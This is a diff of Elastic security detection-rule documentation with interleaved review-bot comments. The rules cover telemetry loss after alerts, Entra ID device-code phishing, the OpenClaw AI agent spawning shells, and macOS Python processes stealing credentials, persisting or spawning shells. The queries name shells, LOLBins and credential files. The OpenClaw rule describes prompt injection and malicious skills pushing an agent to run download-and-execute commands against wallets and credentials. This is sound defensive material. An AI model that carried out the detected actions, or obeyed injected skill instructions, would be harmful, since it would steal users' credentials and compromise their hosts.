@@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-18-elastic-defend-alert-followed-by-telemetry-loss]] +=== Elastic Defend Alert Followed by Telemetry Loss + +Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1562/001/ + +*Tags*: + +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Rule Type: Higher-Order Rule +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Elastic Defend Alert Followed by Telemetry Loss* + + +This rule identifies situations where an Elastic Defend alert is generated on a host and is not followed by +any normal endpoint activity events within a short time window. This may indicate agent tampering, sensor +disablement, host shutdown, system crash, or defense evasion behavior. 
+ + +*Possible investigation steps* + + +- Review the original `endpoint.alert` event and identify the detection that triggered the alert. +- Check the host’s online status, uptime, and reboot history. +- Verify the health and status of the Elastic Defend agent and related services. +- Look for evidence of agent tampering, service stops, or security control modifications. +- Correlate with activity immediately preceding the alert for signs of exploitation or evasion. +- Determine if similar alert → silence patterns are occurring on other hosts. + + +*False positive analysis* + + +- Legitimate system reboots or shutdowns +- Network connectivity loss +- Elastic Agent upgrades or restarts +- Endpoint service crashes +- Maintenance or IT operations + + +*Response and remediation* + + +- Validate host and agent availability. +- Reconnect or re-enroll the agent if telemetry is missing. +- Isolate the host if malicious activity is suspected. +- Investigate for security control tampering. +- Perform broader environment hunting for similar patterns. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=5m + [any where event.dataset == "endpoint.alerts"] + ![any where event.category in ("process", "library", "registry", "network", "dns", "file")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: User Execution +** ID: T1204 +** Reference URL: https://attack.mitre.org/techniques/T1204/ +* Sub-technique: +** Name: Malicious File +** ID: T1204.002 +** Reference URL: https://attack.mitre.org/techniques/T1204/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user.asciidoc new file mode 100644 index 0000000000..6b28ca1553 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user.asciidoc 
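Review bot: The negated second step of the sequence treats any gap in telemetry as loss, so ingestion lag is an unlisted false-positive source: if endpoint events for the host reach the index more than 5 minutes after the `endpoint.alerts` document (buffering while offline, Fleet output backpressure), the rule fires even though the sensor was healthy, and with `Searches indices from: now-9m` and `maxspan=5m` there is little slack for late alerts either. I would add to the false-positive list `- Ingestion delay exceeding the 5 minute window (offline buffering, output backpressure)` and `- Prevention alerts on otherwise idle hosts where the blocked process was the only activity`. The MITRE mapping to Execution / T1204.002 (Malicious File) does not follow from anything the query evaluates, which only looks at dataset and category; it looks inherited and should be dropped or justified in the guide. Both steps are joined on `host.id`, so the guide should also tell readers to confirm that field is populated in both the alert and event documents, otherwise the rule cannot pair them.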
@@ -0,0 +1,163 @@ +[[prebuilt-rule-8-19-18-entra-id-oauth-device-code-grant-by-unusual-user]] +=== Entra ID OAuth Device Code Grant by Unusual User + +Identifies when a user is observed for the first time authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. This rule only applies to Entra ID user types and detects new users leveraging this flow. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://aadinternals.com/post/phishing/ +* https://www.blackhillsinfosec.com/dynamic-device-code-phishing/ +* https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/ +* https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-authentication-flows +* https://www.microsoft.com/en-us/security/blog/2025/02/13/storm-2372-conducts-device-code-phishing-campaign/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-In Logs +* Use Case: Identity and Access Audit +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 8 + +*Rule authors*: + +* Elastic +* Matteo Potito Giorgio + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID OAuth Device Code Grant by Unusual User* + + +This rule detects the first instance of a user authenticating via the DeviceCode 
authentication protocol within the historical window. The DeviceCode authentication workflow is designed for devices that lack keyboards, such as IoT devices and smart TVs. However, adversaries can abuse this mechanism by phishing users and stealing authentication tokens, leading to unauthorized access. + + +*Possible investigation steps* + + +- Review `azure.signinlogs.properties.user_principal_name` and `azure.signinlogs.properties.user_id` to identify the user involved. +- Confirm that `azure.signinlogs.properties.authentication_protocol` is set to `deviceCode`. +- Verify the application through `azure.signinlogs.properties.app_display_name` and `azure.signinlogs.properties.app_id` to determine if it is expected. +- Check `source.ip` and compare it with previous authentication logs to determine whether the login originated from a trusted location. +- Analyze `source.geo.city_name`, `source.geo.region_name`, and `source.geo.country_name` to confirm whether the login location is suspicious. +- Review `source.as.organization.name` to check if the IP is associated with a known organization or cloud provider. +- Review `azure.signinlogs.properties.applied_conditional_access_policies` and `azure.signinlogs.properties.conditional_access_status` to determine if MFA or conditional access policies were enforced or bypassed. +- Look at `azure.signinlogs.properties.authentication_details` to confirm how authentication was satisfied. +- Review `azure.signinlogs.properties.device_detail.browser` and `user_agent.original` to determine if the login aligns with expected device behavior. +- Verify `azure.signinlogs.properties.client_app_used` to confirm whether the login was performed using a known client. +- Check if the user recently reported phishing attempts or suspicious emails. +- Look for recent changes in the user’s account settings, including password resets, role changes, or delegation of access. 
+- Review if other users in the environment have triggered similar DeviceCode authentication events within the same timeframe. + + +*False positive analysis* + + +- If the user is setting up a new device (e.g., a smart TV or kiosk), this authentication may be expected. +- Some legitimate applications or scripts may leverage the DeviceCode authentication protocol for non-interactive logins. +- In cases where shared workstations or conference room devices are in use, legitimate users may trigger alerts. +- If the user is traveling or accessing from a new location, confirm legitimacy before taking action. + + +*Response and remediation* + + +- Immediately revoke any access tokens associated with this authentication event. +- Review additional authentication logs, application access, and recent permission changes for signs of compromise. +- Reset the affected user’s credentials and enforce stricter MFA policies for sensitive accounts. +- Restrict DeviceCode authentication to only required applications. +- Enable additional logging and anomaly detection for DeviceCode logins. +- If phishing is suspected, notify the affected user and provide security awareness training on how to recognize and report phishing attempts. +- Limit DeviceCode authentication to approved users and applications via conditional access policies. + + +==== Setup + + + +*Required Microsoft Entra ID Sign-In Logs* + +This rule requires the Azure integration with Microsoft Entra ID Sign-In logs to be enabled and configured to collect audit and activity logs via Azure Event Hub. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:(azure.activitylogs or azure.signinlogs) + and ( + azure.signinlogs.properties.authentication_protocol:deviceCode or + azure.signinlogs.properties.original_transfer_method:deviceCodeFlow or + azure.activitylogs.properties.authentication_protocol:deviceCode + ) + and event.outcome:success + and azure.signinlogs.properties.user_type:* + and not azure.signinlogs.properties.app_id:( + "29d9ed98-a469-4536-ade2-f981bc1d605e" or + "d5a56ea4-7369-46b8-a538-c370805301bf" or + "80faf920-1908-4b52-b5ef-a8e7bedfc67a" or + "97877f11-0fc6-4aee-b1ff-febb0519dd00" or + "245e1dee-74ef-4257-a8c8-8208296e1dfd" or + "9ba1a5c7-f17a-4de9-a1f1-6178c8d51223" or + "74bcdadc-2fdc-4bb3-8459-76d06952a0e9" or + "4813382a-8fa7-425e-ab75-3b753aab3abb" or + "a850aaae-d5a5-4e82-877c-ce54ff916282" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-execution-via-openclaw-agent.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-execution-via-openclaw-agent.asciidoc new file mode 100644 index 0000000000..d79146db2c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-execution-via-openclaw-agent.asciidoc 
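Review bot: The `and azure.signinlogs.properties.user_type:*` clause at the end of the query requires a sign-in-log field on every document, so the `azure.activitylogs.properties.authentication_protocol:deviceCode` branch can only match if activity-log documents also carry that field; if they do not, listing `azure.activitylogs` in the dataset filter is dead and the guide should say so, or the clause should become `(azure.signinlogs.properties.user_type:* or azure.activitylogs.properties.authentication_protocol:deviceCode)`. The nine excluded `app_id` GUIDs have no accompanying names, so a maintainer cannot tell which first-party clients are being waived; each should be annotated (e.g. a line per GUID in the Setup section naming the application). If `29d9ed98-a469-4536-ade2-f981bc1d605e` is the Microsoft Authentication Broker client ID, as I recall the referenced Storm-2372 write-up discusses, excluding it suppresses exactly the device-code flow that campaign abused, and that exclusion deserves an explicit justification or removal. The Setup text says the integration must collect "audit and activity logs", but the query depends on sign-in logs; the wording should name sign-in logs.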
@@ -0,0 +1,133 @@ +[[prebuilt-rule-8-19-18-execution-via-openclaw-agent]] +=== Execution via OpenClaw Agent + +Detects suspicious child process execution from the OpenClaw, Moltbot, or Clawdbot AI coding agents running via Node.js. These tools can execute arbitrary shell commands through skills or prompt injection attacks. Malicious skills from public registries like ClawHub have been observed executing obfuscated download-and-execute commands targeting cryptocurrency wallets and credentials. This rule identifies shells, scripting interpreters, and common LOLBins spawned by these AI agents. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.malwarebytes.com/blog/threat-intel/2026/01/clawdbots-rename-to-moltbot-sparks-impersonation-campaign +* https://www.tomshardware.com/tech-industry/cyber-security/malicious-moltbot-skill-targets-crypto-users-on-clawhub +* https://blogs.cisco.com/ai/personal-ai-agents-like-openclaw-are-a-security-nightmare +* https://blog.virustotal.com/2026/02/from-automation-to-infection-how.html + +*Tags*: + +* Domain: Endpoint +* Domain: LLM +* OS: Linux +* OS: macOS +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Command and Control +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Execution via OpenClaw Agent* + + +OpenClaw (formerly Clawdbot, rebranded to Moltbot) is a personal AI coding assistant that can execute shell commands +and scripts on behalf of users. 
Malicious actors have weaponized the skill ecosystem (ClawHub) to distribute skills +that execute download-and-execute commands, targeting cryptocurrency wallets and credentials. + + +*Possible investigation steps* + + +- Verify if OpenClaw/Moltbot is an approved application in your organization. +- Review the child process command line for indicators of malicious activity (encoded payloads, remote downloads, credential access). +- Check the parent Node.js process command line to identify which OpenClaw component initiated the execution. +- Examine recently installed skills from ClawHub for malicious or obfuscated code. +- Correlate with network events to identify data exfiltration or C2 communication. +- Review the user's AI conversation history for prompt injection attempts. + + +*False positive analysis* + + +- Developers legitimately using OpenClaw/Moltbot for AI-assisted coding may trigger this rule when the AI executes build scripts, curl commands, or other legitimate automation. +- If the tool is approved, consider tuning based on specific command patterns or adding exception lists. + + +*Response and remediation* + + +- If the child process activity appears malicious, terminate the OpenClaw gateway and investigate the skill that initiated the command. +- Review and remove any suspicious skills from the OpenClaw configuration. +- If credentials may have been accessed, rotate affected secrets and API keys. +- Block known typosquat domains (moltbot.you, clawbot.ai, clawdbot.you) at the network level. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +process where event.type == "start" and + process.parent.name : ("node", "node.exe") and + process.parent.command_line : ("*openclaw*", "*moltbot*", "*clawdbot*") and + process.name : ("bash", "sh", "zsh", "bash.exe", "cmd.exe", "powershell.exe", "curl.exe", "curl", "base64", "xattr", "osascript", "python*", "chmod", "certutil.exe", "rundll32.exe") and + not process.command_line in ("/bin/sh -c ip neigh show", "/usr/bin/sh -c ip neigh show", + "/bin/sh -c arp -a -n -l", "/usr/bin/sh -c arp -a -n -l") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: JavaScript +** ID: T1059.007 +** Reference URL: https://attack.mitre.org/techniques/T1059/007/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Sub-technique: +** Name: Web Protocols +** ID: T1071.001 +** Reference URL: https://attack.mitre.org/techniques/T1071/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files.asciidoc new file mode 100644 index 0000000000..86cb435e17 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files.asciidoc 
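Review bot: The `process.name` list in the query omits several interpreters and LOLBins that an agent-spawned download-and-execute chain would plausibly use on the same three platforms: `pwsh`/`pwsh.exe`, `wscript.exe`, `cscript.exe`, `mshta.exe`, `bitsadmin.exe`, `wget` and `perl`; adding them is a one-line change to that list. Matching the parent solely on `process.parent.command_line : ("*openclaw*", "*moltbot*", "*clawdbot*")` means a gateway installed under a path without those substrings, or launched via a symlink, is invisible; if the tool allows an arbitrary install location, the guide should say the rule covers default installs only. The two `not process.command_line in (...)` exclusions are exact-match, so any variant of the same benign discovery commands (different shell path, extra flags) will alert; that is acceptable for a medium-severity rule but worth stating in the false-positive section. The typosquat domains listed in remediation are not tied to any of the four references, so a reader cannot verify them; cite the source or drop the specific names.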
@@ -0,0 +1,114 @@ +[[prebuilt-rule-8-19-18-first-time-python-accessed-sensitive-credential-files]] +=== First Time Python Accessed Sensitive Credential Files + +Detects the first time a Python process accesses sensitive credential files on a given host. This behavior may indicate post-exploitation credential theft via a malicious Python script, compromised dependency, or malicious model file deserialization. Legitimate Python processes do not typically access credential files such as SSH keys, AWS credentials, browser cookies, Kerberos tickets, or keychain databases, so a first occurrence is a strong indicator of compromise. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.file-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/ +* https://github.com/trailofbits/fickling + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time Python Accessed Sensitive Credential Files* + + +Attackers who achieve Python code execution — whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) — often target sensitive credential files such as SSH keys, cloud provider credentials, browser session cookies, and macOS keychain data. Since legitimate Python processes do not typically access these files, a first occurrence from a Python process is highly suspicious. 
+ +This rule leverages the Elastic Defend sensitive file `open` event, which is only collected for known sensitive file paths, combined with the New Terms rule type to alert on the first time a specific credential file is accessed by Python on a given host within a 7-day window. + + +*Possible investigation steps* + + +- Examine the Python process command line and arguments to identify the script or command that triggered the file access. +- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency. +- Review the specific credential file that was accessed and assess the potential impact (SSH keys enable lateral movement, AWS credentials enable cloud access, browser cookies enable session hijacking). +- Check for outbound network connections from the same process tree that may indicate credential exfiltration. +- Investigate the origin of any recently downloaded scripts, packages, or model files on the host. +- Look for file creation events in `/tmp/` or other staging directories that may contain copies of the stolen credentials. + + +*False positive analysis* + + +- Python-based secret management tools (e.g., `aws-cli`, `gcloud`) legitimately access credential files. Consider excluding known trusted executables by process path. +- SSH automation scripts using `paramiko` or `fabric` may read SSH keys. Evaluate whether the access pattern matches known automation workflows. +- Security scanning tools running Python may enumerate credential files as part of their assessment. + + +*Response and remediation* + + +- Immediately rotate any credentials that were potentially accessed (SSH keys, AWS access keys, cloud tokens). +- Quarantine the Python process and investigate the source script, package, or model file that triggered the access. +- If a malicious file is confirmed, identify all hosts where it may have been distributed. 
+- Review outbound network connections from the host around the time of the credential access to check for exfiltration. +- Consider implementing `weights_only=True` enforcement for PyTorch model loading across the environment. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and host.os.type:macos and event.action:open and +process.name:python* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Keychain +** ID: T1555.001 +** Reference URL: https://attack.mitre.org/techniques/T1555/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon.asciidoc new file mode 100644 index 0000000000..d4d9eb687b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon.asciidoc 
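Review bot: The query carries no `file.path` or `file.name` predicate, so the entire "sensitive credential file" scope rests on the guide's claim that Elastic Defend only emits `open` events for known sensitive paths; if that data-source behaviour changes or a different `event.action:open` producer lands in `logs-endpoint.events.file-*`, this becomes a first-time-Python-opened-any-file rule. I would either pin the scope in the query (for example restricting to the categories the description names, such as `*/.ssh/*`, `*/.aws/credentials`, `*/Library/Keychains/*`, verified against the real event schema) or state the dependency plainly in the Setup section. `process.name:python*` is also trivially sidestepped by copying the interpreter under another name or by an embedded interpreter (PyInstaller bundles, apps that link libpython); the guide should note that this rule only sees interpreters named `python*` and that `process.executable`-based tuning is preferable to name-based exclusions. The false-positive entry naming `aws-cli` and `gcloud` is only accurate for script-based installs where the interpreter is the process name; the bundled v2 binaries would not match.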
@@ -0,0 +1,114 @@ +[[prebuilt-rule-8-19-18-first-time-python-created-a-launchagent-or-launchdaemon]] +=== First Time Python Created a LaunchAgent or LaunchDaemon + +Detects the first time a Python process creates or modifies a LaunchAgent or LaunchDaemon plist file on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can establish persistence on macOS by writing plist files to LaunchAgent or LaunchDaemon directories. Legitimate Python processes do not typically create persistence mechanisms, so a first occurrence is a strong indicator of compromise. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.persistence-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/ +* https://github.com/trailofbits/fickling + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time Python Created a LaunchAgent or LaunchDaemon* + + +macOS LaunchAgents and LaunchDaemons are plist files that configure programs to run automatically at login or boot. Attackers who achieve Python code execution — whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) — can drop plist files to establish persistence on the compromised host. This ensures their payload survives reboots and user logouts. 
+ +This rule uses the Elastic Defend persistence event type (`event.action:"launch_daemon"`), which captures plist metadata including the program arguments, run-at-load configuration, and keep-alive settings. The New Terms rule type alerts on the first time a Python process creates a LaunchAgent or LaunchDaemon on a given host within a 7-day window. + + +*Possible investigation steps* + + +- Review the persistence event fields (`Persistence.runatload`, `Persistence.keepalive`, `Persistence.args`, `Persistence.path`) to understand the plist configuration. +- Examine the program path and arguments specified in the plist to determine if they reference a known legitimate application or a suspicious binary. +- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency. +- Verify if the target binary referenced in the plist exists on disk and whether it is signed or trusted. +- Investigate the origin of any recently downloaded scripts, packages, or model files on the host. +- Check for other persistence mechanisms that may have been established around the same time. + + +*False positive analysis* + + +- Some Python-based system management tools (e.g., Ansible, SaltStack) may legitimately create LaunchAgent or LaunchDaemon plist files. Evaluate whether the activity matches a known automation workflow. +- Python-based application installers may create plist files during setup. Check if the activity correlates with a known software installation. + + +*Response and remediation* + + +- Immediately unload the suspicious LaunchAgent or LaunchDaemon using `launchctl unload` with the plist path. +- Remove the suspicious plist file and any associated binary it references. +- Kill any processes launched by the plist file. +- Investigate and quarantine the Python script, package, or model file that created the persistence mechanism. 
+- Scan the host for additional indicators of compromise. +- If a malicious file is confirmed, identify all hosts where it may have been distributed. + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:macos and event.action:"launch_daemon" and +process.name:python* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Launch Agent +** ID: T1543.001 +** Reference URL: https://attack.mitre.org/techniques/T1543/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host.asciidoc new file mode 100644 index 0000000000..ee9f952e19 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host.asciidoc 
@@ -0,0 +1,117 @@ +[[prebuilt-rule-8-19-18-first-time-python-spawned-a-shell-on-host]] +=== First Time Python Spawned a Shell on Host + +Detects the first time a Python process spawns a shell on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can result in shell spawns that would not occur during normal workflows. Since legitimate Python processes rarely shell out to interactive shells, a first occurrence of this behavior on a host is a strong signal of potential compromise. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.process-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/ +* https://github.com/trailofbits/fickling +* https://5stars217.github.io/2024-03-04-what-enables-malicious-models/ + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Domain: LLM + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Time Python Spawned a Shell on Host* + + +Attackers who achieve Python code execution — whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) — often spawn shell processes to perform reconnaissance, credential theft, persistence, or reverse shell activity. Since legitimate Python workflows rarely shell out with `-c`, a first occurrence is highly suspicious. + +This rule uses the New Terms rule type to detect the first occurrence of a Python process spawning a shell with the `-c` flag on a given host within a 7-day window. 
This approach reduces false positives from recurring legitimate Python workflows while surfacing novel, potentially malicious activity. + + +*Possible investigation steps* + + +- Examine the parent Python process command line to identify the script or command that triggered the shell spawn. +- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency. +- Review the shell command arguments to assess intent (credential access, reverse shell, persistence, reconnaissance). +- Inspect the full process tree to determine if the Python process was launched from an interactive session, a cron job, or an automated pipeline. +- Investigate the origin of any recently downloaded scripts, packages, or model files on the host. +- Correlate with other hosts in the environment to determine if the same behavior is occurring elsewhere, which may indicate a supply chain compromise. + + +*False positive analysis* + + +- Development environments where Python scripts legitimately shell out for system tasks (e.g., build scripts, CI/CD runners) may trigger this rule on first occurrence. Consider excluding known CI/CD working directories or build automation paths. +- Package installation via pip or conda may spawn shells during post-install scripts. These are excluded by the query filter. +- Jupyter notebooks executing system commands via `!` or `subprocess` may trigger this rule in data science environments. + + +*Response and remediation* + + +- Investigate the shell command that was executed and assess its impact (credential access, persistence, data exfiltration). +- If a malicious file is confirmed, quarantine it and identify its source (PyPI, Hugging Face, shared drive, email attachment). +- Scan other hosts that may have received the same file. +- Review and rotate any credentials that may have been accessed. 
+- Consider implementing `weights_only=True` enforcement for PyTorch model loading across the environment. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:macos and event.type:start and event.action:exec and +process.parent.name:python* and +process.name:(bash or dash or sh or tcsh or csh or zsh or ksh or fish) and process.args:"-c" and +not process.command_line:(*pip* or *conda* or *brew* or *jupyter*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Python +** ID: T1059.006 +** Reference URL: https://attack.mitre.org/techniques/T1059/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain.asciidoc new file mode 100644 index 0000000000..fed6066e38 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-first-time-seen-dns-query-to-rmm-domain.asciidoc 
